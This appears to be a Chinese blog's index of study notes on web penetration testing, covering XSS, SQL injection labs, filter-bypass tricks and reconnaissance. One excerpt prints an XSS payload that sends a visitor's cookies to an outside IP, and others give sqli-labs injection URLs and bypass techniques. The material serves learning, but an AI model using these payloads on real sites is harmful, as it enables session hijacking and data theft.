
web渗透
这要记录一些web方面的记录文章
鸣蜩十四
这道题太难了,真的不会,不会解啊!!
展开
-
XSS获取键盘原理
涉及的js知识:onkeypress 事件会在键盘按键被按下并释放一个键时发生fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值XMLHttpRequest 对象能够:在不重新加载页面的情况下更新网页在页面已加载后从服务器请求数据在页面已加载后从服务器接收数据在后台向服务器发送数据encodeURI(key)对URI 进行完整的编码http.open第三个参数设置请求是否为原创 2021-08-09 10:36:53 · 736 阅读 · 0 评论 -
xss的cookie窃取原理
原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收具体实现: 攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 远程接收代码:<?php$c...原创 2021-08-09 10:33:51 · 1518 阅读 · 0 评论 -
DVWA之SQL Injection
SQL Injection:绕过空格(注释符/* */,%a0)括号绕过空格引号绕过(使用十六进制) %df%5c%27逗号绕过(使用from或者offset)or and xor not绕过:and=&& or=|| xor=| not=!绕过注释符号(#,--(后面跟一个空格))过滤:id=1' union select 1,2,3||'1=绕过: 使用like 、rlike 、regexp 或者 使用< 或者 >绕过union,select,wh...原创 2021-06-21 10:49:28 · 277 阅读 · 0 评论 -
sql-lib 1-10关
1.字符型http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库ht...原创 2021-06-14 22:13:54 · 762 阅读 · 1 评论 -
SQL注入(思维导图)
原创 2021-05-27 21:46:02 · 880 阅读 · 0 评论 -
初步信息收集小总结
一.查看是否有cdn可以先进行多地ping查看是否有cdn,如果返回多个ip则很有可能拥有cdn,此时就需要绕过cdn查看目标站点的真实ip地址绕过方法:1.通过子域名入手2.利用网站漏洞,例如phpinfo敏感信息泄露3.历史DNS记录4.邮件服务入手5.国外请求6.查询https证书7. 。。。还有很多大家可以上网一一试试还有一个问题就是如果绕过cdn以后,那么你怎么确认你获得的ip是真实的ip呢?可以在本地的host文件当中对域名进行绑定ip,cdn的ip是访问不到的二.查看是原创 2021-05-25 18:11:44 · 137 阅读 · 0 评论 -
初步信息收集
对信息收集进行了初步的归总,在web初步的信息收集中大概就是以下的步骤,对于app则就几种,一种就是反编译,查看app的源码,另一种就是在app上进行抓包,查看是否有web协议,下一章记录一下具体的方法...原创 2021-05-23 17:50:44 · 209 阅读 · 0 评论 -
整形与字符型sql注入
1、数字型注入当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。测试步骤:(1) 加单引号,URL:www.text.com/text.php?id=3’对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;(2) 加and 1=1 ,URL:www.text.com/text.php...原创 2020-08-05 16:59:53 · 648 阅读 · 0 评论 -
insert,delete,update注入
insert:通过增加这种方法,把数据库增加到表中,最后通过查看获得信息例如在留言板中,通过注入,然后出现在留言板上insert into 表名 values(null,‘111’,‘select user()’);delete:只能通过时间注入和布尔注入的时候使用delete注入,通过查看删除一条数据的时间来慢慢测出数据update:通过修改内容,把内容修改成你想知道的信息,通过查询可知这三种注入也都支持报错注入delete from admin where id=6 and 1=update原创 2020-08-05 11:52:11 · 248 阅读 · 0 评论 -
sql注入--报错注入
利用数据库的bug进行利用,看报错信息,报错的信息会出现我们想要的信息讲解报错注入原理非常详细的一篇博客https://blog.youkuaiyun.com/he_and/article/details/80455884concat()这个函数用来将两个字符串连接为一个字符串floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。.rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区别的,rand(0)相当于给rand()函数传递了一个参数,然后r原创 2020-08-05 11:48:39 · 691 阅读 · 0 评论 -
布尔盲注手注
布尔盲注mid(str,1,3)字符串截取 意思就是把str这个字符串从第一个字符串开始,截取前三个显示substr()这个函数和上面的用法一样,也是用来截取字符串的ORD()转换成ascii码Length()统计长度version()是查看数据库版本database()查看当前数据库名user() 查看当前用户猜解数据库名字的时候可以使用ORD(mid(database(),1,...原创 2019-12-07 23:29:38 · 371 阅读 · 0 评论 -
时间盲注手注
基于时间的盲注:时间的概念:使用特定函数让数据库去执行,通过自己的设定,来查看数据库是否get到我们的请求函数sleep()设定数据库的延时或者暂停的时间函数limit 0,1 限制第一个的第一个字符函数mid 1,1 从第一个字符开始截取,只截取一个函数benchmark(参数一,参数二),第一是执行多少次,二是某项操作。1、找注入点通过输入以下两行,根据返回的延迟判断存在字符型注...原创 2019-12-07 23:21:17 · 338 阅读 · 0 评论 -
sql注入-整型与字符型
1、数字型注入当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。测试步骤:(1) 加单引号,www.aaa.com/a.php?id=1’对应的sql:select * from table where id=1’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;(2)1=1返回正确 加and 1=1 ,www.aaa.com/a.php?id=1’and...原创 2019-11-19 21:07:48 · 1563 阅读 · 0 评论 -
xss学习总结(二)
Browser Exploitation Framework (BeEF)BeEF是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单;具体的操作过程我也是看完别人的博客以后才完全明了;https://blog.youkuaiyun.com/Laon_Chan/article/details/78...原创 2019-09-05 19:48:38 · 238 阅读 · 0 评论 -
xss基础(一)
xss是一种经常出现的web应用中的计算机安全漏洞,是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码,进而窃取用户资料,利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。最常见的xss攻击分为两类,一种是反射性,另一种就是储存性。1.反射性xss(reflected xss) ...原创 2019-09-04 23:54:32 · 631 阅读 · 1 评论